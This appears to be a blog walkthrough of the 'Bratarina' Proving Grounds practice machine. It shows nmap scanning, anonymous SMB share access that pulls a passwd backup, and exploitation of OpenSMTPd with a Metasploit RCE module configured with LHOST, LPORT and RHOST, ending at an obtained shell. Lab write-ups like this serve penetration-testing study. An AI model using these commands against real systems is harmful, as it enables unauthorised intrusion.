Bratarina is a Linux-based machine on Offensive Security’s paid subscription, Proving Grounds Practice. Although rated as easy, the Proving Grounds community notes this as Intermediate. This box is also listed on TJ-Null’s OSCP-Like machine, which means it’s great practice for the OSCP exam. Let’s get stuck in.
We start with nmap;
sudo nmap -sC -sV -p- 192.168.171.71 -oA nmap/fullLooks simple enough. Port 22 is SSH (this is rarely the initial entry point), port 25 SMTP, 53 is DNS and 80 and 445.
Let’s start by trying to connect to SMB with null authentication;
smbclient -L 192.168.79.71
We can. So let’s log into the share;
smbclient \\\\192.168.79.71\\backups
Let’s see the contents of this share. There is one file called “passwd.bak”, which we can download locally using the ‘get’ command.
We run the “cat” command over the file to view the contents.
We see a large list of users, but really we are only interested in those that have a bash shell. Let’s grep for those entires and add these users to a text file in case we need to use them later.
Navigating to the web page on port 80, we see a CMS called FlaskBB. A quick searchsploit reveals nothing of interest here.
Moving to OpenSMTPd 2.0 on port 25, searchsploit shows us some results for remote code execution, including a couple for Metasploit. Let’s have some Metasploit fun.
Boot it up with the -q flag so we don’t get loud, spammy banners;
sudo msfconsole -qSearch for the exploit;
search opensmtpd
We can easily jump into the first exploit using and its options
use 0
optionsWe have to set some parameters, including LHOST, LPORT, and RHOST;
set lhost tun0
set lport 80
set rhost 192.168.157.71And let’s run it;
run
And there we have it!
